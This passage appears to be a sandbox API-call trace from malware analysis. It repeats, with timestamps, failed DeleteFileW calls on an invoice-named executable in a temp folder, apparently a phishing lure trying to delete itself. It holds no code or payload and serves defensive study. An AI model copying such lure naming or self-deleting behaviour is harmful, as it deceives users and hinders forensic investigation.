(lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.775] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.775] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.775] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.775] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.776] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.776] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.776] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.776] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.776] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.776] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.776] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.776] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.776] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.776] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.777] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.777] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.777] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.777] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.777] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.777] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.777] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.777] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.777] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.777] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.778] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.778] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.778] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.778] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.778] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.778] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.778] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.778] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.778] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.778] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.779] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.779] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.779] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.779] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.779] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.779] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.779] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.779] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.779] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.779] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.780] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.780] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.780] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.780] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.780] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.780] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.780] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.780] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.780] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.780] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.781] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.781] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.781] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.781] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.781] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.781] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.781] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.781] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.781] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.781] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.782] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.782] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.782] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.782] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.782] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.782] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.782] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.782] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.782] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.782] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.783] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.783] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.783] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.783] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.783] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.783] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.783] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.783] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.783] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for 